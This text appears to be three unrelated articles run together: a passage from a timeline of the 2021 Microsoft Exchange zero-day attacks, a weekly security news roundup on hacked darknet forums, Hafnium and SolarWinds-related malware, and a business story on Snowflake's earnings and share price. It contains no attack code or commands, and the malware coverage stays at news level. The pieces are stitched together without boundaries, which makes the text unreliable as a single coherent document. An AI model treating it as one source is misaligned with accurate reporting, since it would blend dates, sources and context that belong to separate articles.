  • Jan. 29: Trend Micro publishes a blog post about “Chopper” web shells being dropped via Exchange flaws (but attributes cause as Exchange bug Microsoft patched in 2020)
  • Feb. 2: Volexity warns Microsoft about active attacks on previously unknown Exchange vulnerabilities.
  • Feb. 8: Microsoft tells Dubex it has “escalated” its report internally.
  • Feb. 18: Microsoft confirms with DEVCORE a target date of Mar. 9 (tomorrow) for publishing security updates for the Exchange flaws. That is the second Tuesday of the month — a.k.a. “Patch Tuesday,” when Microsoft releases monthly security updates (and yes that means check back here tomorrow for the always riveting Patch Tuesday roundup).
  • Feb. 26-27: Targeted exploitation gradually turns into a global mass-scan; attackers start rapidly backdooring vulnerable servers.
  • Mar. 2: A week earlier than previously planned, Microsoft releases updates to plug 4 zero-day flaws.
  • Mar. 2: DEVCORE researcher Orange Tsai (noted for finding and reporting some fairly scary bugs in the past) jokes that nobody guessed Exchange as the source of his Jan. 5 tweet about “probably the most serious [remotely exploitable bug] I have ever reported.”
  • Mar. 3: Tens of thousands of Exchange servers compromised worldwide, with thousands more servers getting freshly hacked each hour.
  • Mar. 4: White House National Security Advisor Jake Sullivan tweets about importance of patching Exchange flaws, and how to detect if systems are already compromised.
  • Mar. 5, 1:26 p.m. ET: In a live briefing, White House press secretary Jen Psaki expresses concern over the size of the attack.
  • Mar. 5, 4:07 p.m. ET: KrebsOnSecurity breaks the news that at least 30,000 organizations in the U.S. — and hundreds of thousands worldwide — now have backdoors installed.
  • Mar. 5, 6:56 p.m. ET: Wired.com confirms the reported number of victims.
  • Mar. 5, 8:04 p.m. ET: Former CISA head Chris Krebs tweets the real victim numbers “dwarf” what’s been reported publicly.
  • Mar. 6: CISA says it is aware of “widespread domestic and international exploitation of Microsoft Exchange Server flaws.”
  • Mar. 7-Present: Security experts continue effort to notify victims, coordinate remediation, and remain vigilant for “Stage 2” of this attack (further exploitation of already-compromised servers).

Update, 12:11 p.m. ET: Correct link to Dubex site (it’s Dubex.dk). Also clarified timing of White House press statement expressing concern over the number of the Exchange Server compromises. Corrected date of Orange Tsai tweet.

The Good, the Bad and the Ugly in Cybersecurity – Week 10

The Good

Are cyberattacks on cyberattackers (aka ‘hacking back’) good news or bad news? While that question elicits mixed responses among security professionals, we can’t help but feel that when darknet criminals start to ask “are darkweb forums safe anymore?” this must be a good thing for the security of the rest of us. This week has seen the latest in a series of attacks on darknet forums where criminals regularly sell malware, credit card details, account credentials and leaked or stolen data.

Mazafuka (aka ‘Maza’) is a darknet criminal forum that’s been around so long many cyber pros were surprised to hear it was still in existence this week, when news broke that the Russian cybercrime forum had been the victim of a hack. Almost 3,000 user records containing user IDs, names, passwords and other social media contact info were leaked, with the latter likely of huge interest to LEAs around the world.

Several weeks previously, another Russian-speaking hacker forum ‘Verified’ was forcibly taken over by unknown intruders. Hacktivists, deep-cover law enforcement or a rival gang are all possibilities, although in a public post the attackers claimed to be “like-minded” and insisted they only wanted to develop and improve the site. Whether the shady users of the site will trust this new enforced management remains to be seen. These attacks followed in the wake of similar hacks on carding forum ‘Club2Crd’ and darknet website ‘Dread’ last month.

If such hacks are disrupting the ability of cyber criminals to profit from their misdeeds, we reckon it’s worth counting as good news. And besides, whether you take pleasure in the bad guys getting a taste of their own medicine or not, it just goes to show you can never take cybersecurity for granted, whichever side of the law you are on.

The Bad

A Chinese APT group that Microsoft have dubbed ‘Hafnium’ (also the name of the chemical element Hf) have been fingered for in-the-wild (ITW) attacks targeting Microsoft Exchange Server, it was revealed this week. The Redmond tech giant was forced to release an out-of-band security update to patch seven vulnerabilities affecting Exchange Server versions as old as 2013.

Microsoft said that they were aware of active exploits in the wild leveraging four of the patched vulnerabilities. CISA also released an advisory the following day warning that attackers could use the flaws to gain persistent system access and control of an enterprise network, stating that this “poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action”.

In a separate post, Microsoft said the state-sponsored Hafnium group had been utilizing the zero day vulnerabilities to steal data from U.S. organizations, specifically via CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.

SentinelOne has released its own advisory, technical review, IoCs and guidance for SentinelOne customers here.

The Ugly

Nobody expected the hack of the year (decade? century?), aka the SolarWinds breach, to go away anytime soon, and so it’s not entirely a surprise to hear that Microsoft have reported three new strains of malware likely associated with the APT espionage campaign, widely-believed to be of Russian intelligence origin.

In a report yesterday, Microsoft researchers dubbed the three new strains Sibot, GoldFinder and GoldMax (the latter is also being tracked as SUNSHUTTLE by FireEye). While we’re on naming conventions, Microsoft have also chosen to label the APT behind the entire campaign as ‘Nobelium’ (which happens to be a synthetic, radioactive chemical element with the atomic number of 102, in case you were wondering!); the significance of the name choices was not explained.

Sibot refers to three variants of a VBScript that download a malicious DLL from a compromised website, while GoldFinder and GoldMax are both malware tools written in Go (Golang).

GoldFinder appears to be a custom HTTP tracer tool that logs the route a request takes to reach the attacker’s C2 server. The threat actors can use it to identify proxy servers and network security devices sitting between the victim and the C2, aiding discovery of other potential points of ingress. GoldMax functions as a backdoor, allowing the attacker to communicate securely with a C2 and to launch commands on the victim’s device. Comprehensive details and IoCs are available here.

The significance of finding further late-stage malware tools in compromised systems should not be underestimated. The full impact of the SolarWinds breach is still unfolding, and enterprise security teams are encouraged to remain vigilant and proactive in following up on these developments.



Snowflake latest enterprise company to feel Wall Street’s wrath after good quarter

Snowflake reported earnings this week, and the results look strong with revenue more than doubling year-over-year.

However, while the company’s fourth quarter revenue rose 117% to $190.5 million, it apparently wasn’t good enough for investors, who have sent the company’s stock tumbling since it reported Wednesday after the bell.

It was similar to the reaction that Salesforce received from Wall Street last week after it announced a positive earnings report. Snowflake’s stock closed down around 4% today, a recovery compared to its midday lows when it was off nearly 12%.

Why the declines? Wall Street’s reaction to earnings often depends more on what a company says it will do next than on its most recent results. But Snowflake’s guidance for its current quarter appeared strong as well, with predicted revenue of $195 million to $200 million, in line with analysts’ expectations.

Sounds good, right? Apparently being in line with analyst expectations isn’t good enough for investors for certain companies. You see, it didn’t exceed the stated expectations, so the results must be bad. I am not sure how meeting expectations is as good as a miss, but there you are.

It’s worth noting of course that tech stocks have taken a beating so far in 2021. And as my colleague Alex Wilhelm reported this morning, that trend only got worse this week. Consider that the tech-heavy Nasdaq is down 11.4% from its 52-week high, so perhaps investors are flogging everyone and Snowflake is merely caught up in the punishment.

Snowflake CEO Frank Slootman pointed out in the earnings call this week that Snowflake is well positioned, as shown by the fact that his company has removed the data limitations of on-prem infrastructure. The beauty of the cloud is limitless resources, which means the company helps customers manage consumption instead of capacity, an evolution that works in Snowflake’s favor.

“The big change in paradigm is that historically in on-premise data centers, people have to manage capacity. And now they don’t manage capacity anymore, but they need to manage consumption. And that’s a new thing for — not for everybody but for most people — and people that are in the public cloud. I have gotten used to the notion of consumption obviously because it applies equally to the infrastructure clouds,” Slootman said in the earnings call.

Snowflake has to manage expectations, something that translated into a dozen customers paying $5 million or more on a trailing 12 month basis, according to the company. That’s a nice chunk of change by any measure. It’s also clear that while there is a clear tilt toward the cloud, the amount of data that has been moved there is still a small percentage of overall enterprise workloads, meaning there is lots of growth opportunity for Snowflake.

What’s more, Snowflake executives pointed out that there is a significant ramp up time for customers as they shift data into the Snowflake data lake, but before they push the consumption button. That means that as long as customers continue to move data onto Snowflake’s platform, they will pay more over time, even if it will take time for new clients to get started.

So why is Snowflake’s quarterly percentage growth not expanding? Well, as a company gets to the size of Snowflake, it gets harder to maintain those gaudy percentage growth numbers as the law of large numbers begins to kick in.

I’m not here to tell Wall Street investors how to do their job, anymore than I would expect them to tell me how to do mine. But when you look at the company’s overall financial picture, the amount of untapped cloud potential and the nature of Snowflake’s approach to billing, it’s hard not to be positive about this company’s outlook, regardless of the reaction of investors in the short term.

Note: This article originally stated the company had a dozen customer paying $5 million or more per month. It’s actually on a trailing 12 month basis and we have updated the article to reflect that.